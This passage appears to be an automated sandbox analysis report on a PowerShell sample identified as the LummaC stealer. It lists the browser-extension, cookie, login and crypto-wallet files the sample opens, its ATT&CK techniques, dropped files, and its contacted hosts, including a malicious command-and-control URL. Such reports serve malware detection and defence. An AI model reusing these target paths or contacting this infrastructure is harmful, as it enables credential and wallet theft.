                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: Yara matchFile source: 00000009.00000003.2177293553.0000000003427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2238461589.000000000342F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2199449864.0000000003423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2238430241.0000000003428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2226006098.0000000003424000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2152637778.0000000003428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2199967273.0000000003423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2152329165.0000000003425000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation                    		11
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		11
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		11
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		LSASS Memory12
                    File and Directory Discovery                    		Remote Desktop Protocol21
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		Logon Script (Windows)212
                    Process Injection                    		4
                    Obfuscated Files or Information                    		Security Account Manager134
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		11
                    Software Packing                    		NTDS431
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSHKeylogging115
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    DLL Side-Loading                    		Cached Domain Credentials221
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562214 Sample: IaslcsMo.ps1 Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 68 rentry.co 2->68 70 marchhappen.cyou 2->70 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 84 10 other signatures 2->84 11 powershell.exe 1 233 2->11         started        15 Set-up.exe 2 2->15         started        17 Set-up.exe 2->17         started        signatures3 82 Connects to a pastebin service (likely for C&C) 68->82 process4 file5 58 C:\Users\user\AppData\...\UpdateCommon.dll, PE32 11->58 dropped 60 C:\Users\user\AppData\...\UpdateClient.dll, PE32 11->60 dropped 62 C:\Users\user\AppData\Roaming\...\Set-up.exe, PE32 11->62 dropped 64 13 other files (10 malicious) 11->64 dropped 104 Found suspicious powershell code related to unpacking or dynamic code loading 11->104 106 Loading BitLocker PowerShell Module 11->106 108 Powershell drops PE file 11->108 19 Set-up.exe 11 11->19         started        23 conhost.exe 11->23         started        110 Maps a DLL or memory area into another process 15->110 112 Found direct / indirect Syscall (likely to bypass EDR) 15->112 25 more.com 2 15->25         started        signatures6 process7 file8 46 C:\Users\user\AppData\Roaming\...\QtXml4.dll, PE32 19->46 dropped 48 C:\Users\user\AppData\...\QtNetwork4.dll, PE32 19->48 dropped 50 C:\Users\user\AppData\Roaming\...\QtGui4.dll, PE32 19->50 dropped 54 4 other files (1 malicious) 19->54 dropped 86 Found API chain indicative of debugger detection 19->86 88 Maps a DLL or memory area into another process 19->88 90 Switches to a custom stack to bypass stack traces 19->90 92 Found direct / indirect Syscall (likely to bypass EDR) 19->92 27 more.com 2 19->27         started        52 C:\Users\user\AppData\Local\Temp\yhg, PE32 25->52 dropped 94 Writes to foreign memory regions 25->94 31 conhost.exe 25->31         started        33 msiexec.exe 25->33         started        signatures9 process10 file11 66 C:\Users\user\AppData\Local\Temp\wpkoqtsrt, PE32 27->66 dropped 114 Writes to foreign memory regions 27->114 116 Found hidden mapped module (file has been removed from disk) 27->116 118 Maps a DLL or memory area into another process 27->118 120 Switches to a custom stack to bypass stack traces 27->120 35 msiexec.exe 1 27->35         started        40 conhost.exe 27->40         started        signatures12 process13 dnsIp14 72 marchhappen.cyou 104.21.2.224, 443, 49736, 49737 CLOUDFLARENETUS United States 35->72 74 rentry.co 172.67.75.40, 443, 49761 CLOUDFLARENETUS United States 35->74 56 C:\Users\user\...\S8RGGAQW7QVSMBVCVHPY4.ps1, HTML 35->56 dropped 96 Query firmware table information (likely to detect VMs) 35->96 98 Tries to harvest and steal browser information (history, passwords, etc) 35->98 100 Tries to steal Crypto Currency Wallets 35->100 102 Switches to a custom stack to bypass stack traces 35->102 42 powershell.exe 7 35->42         started        file15 signatures16 process17 process18 44 conhost.exe 42->44         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    IaslcsMo.ps10%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\wpkoqtsrt100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\yhg100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\wpkoqtsrt62%ReversingLabsWin32.Trojan.MintZard
                    C:\Users\user\AppData\Local\Temp\yhg62%ReversingLabsWin32.Trojan.MintZard
                    C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe3%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.reneelab.fr/0%Avira URL Cloudsafe
                    http://www.reneelab.it/0%Avira URL Cloudsafe
                    https://www.digicert.c0%Avira URL Cloudsafe
                    http://support.reneelab.com/anonymous_requests/new0%Avira URL Cloudsafe
                    https://marchhappen.cyou/api100%Avira URL Cloudmalware
                    http://www.reneelab.biz/0%Avira URL Cloudsafe
                    http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia0%Avira URL Cloudsafe
                    https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x0%Avira URL Cloudsafe
                    https://downloads.reneelab.com.cn/download_api.php0%Avira URL Cloudsafe
                    https://downloads.reneelab.com/download_api.php0%Avira URL Cloudsafe
                    http://bug.reneelab.com0%Avira URL Cloudsafe
                    http://www.reneelab.cc/0%Avira URL Cloudsafe
                    http://www.reneelab.ru/0%Avira URL Cloudsafe
                    http://qt.digia.com/0%Avira URL Cloudsafe
                    http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D0%Avira URL Cloudsafe
                    http://b.chenall.net/menu.lst0%Avira URL Cloudsafe
                    http://www.reneelab.de/0%Avira URL Cloudsafe
                    http://grub4dos.chenall.net/e/%u)0%Avira URL Cloudsafe
                    https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac0%Avira URL Cloudsafe
                    http://isecure-a.reneelab.com/webapi.php?code=0%Avira URL Cloudsafe
                    http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
                    http://www.reneelab.es/0%Avira URL Cloudsafe
                    http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo0%Avira URL Cloudsafe
                    http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore0%Avira URL Cloudsafe
                    https://www.reneelab.com0%Avira URL Cloudsafe
                    http://bugreports.qt-project.org/0%Avira URL Cloudsafe
                    http://www.reneelab.com.cn/0%Avira URL Cloudsafe
                    http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa0%Avira URL Cloudsafe
                    http://www.reneelab.pl/0%Avira URL Cloudsafe
                    http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
                    https://www.reneelab.comwww.reneelab.comhttp://https://00%Avira URL Cloudsafe
                    http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User0%Avira URL Cloudsafe
                    http://www.reneelab.kr/0%Avira URL Cloudsafe
                    http://www.reneelab.jp/0%Avira URL Cloudsafe
                    marchhappen.cyou0%Avira URL Cloudsafe
                    https://downloads.reneelab.com/passnow/passnow_0%Avira URL Cloudsafe
                    http://www.winimage.com/zLibDll1.2.60%Avira URL Cloudsafe
                    http://isecure.reneelab.com.cn/webapi.php?code=0%Avira URL Cloudsafe
                    http://trolltech.com/xml/features/report-start-end-entityUnknown0%Avira URL Cloudsafe
                    http://qt.digia.com/product/licensing0%Avira URL Cloudsafe
                    http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n0%Avira URL Cloudsafe
                    http://www.reneelab.net/0%Avira URL Cloudsafe
                    http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst0%Avira URL Cloudsafe
                    http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html0%Avira URL Cloudsafe
                    http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://0%Avira URL Cloudsafe
                    http://www.reneelab.com/0%Avira URL Cloudsafe
                    http://isecure.reneelab.com/webapi.php?code=0%Avira URL Cloudsafe
                    http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
                    http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()0%Avira URL Cloudsafe
                    http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony0%Avira URL Cloudsafe
                    https://downloads.reneelab.com.cn/passnow/passnow_0%Avira URL Cloudsafe
                    http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    rentry.co
                    		172.67.75.40
                    		truefalse
                      		high
                      marchhappen.cyou
                      		104.21.2.224
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://marchhappen.cyou/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://rentry.co/feouewe5/rawfalse
                          		high
                          marchhappen.cyoutrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://repository.certum.pl/ctsca2021.cer0Apowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.certum.pl/ctsca2021.crl0opowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_xSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.digicert.cSet-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.vmware.com/0Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItaliaSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://support.reneelab.com/anonymous_requests/newSet-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.reneelab.fr/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://downloads.reneelab.com.cn/download_api.phpSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
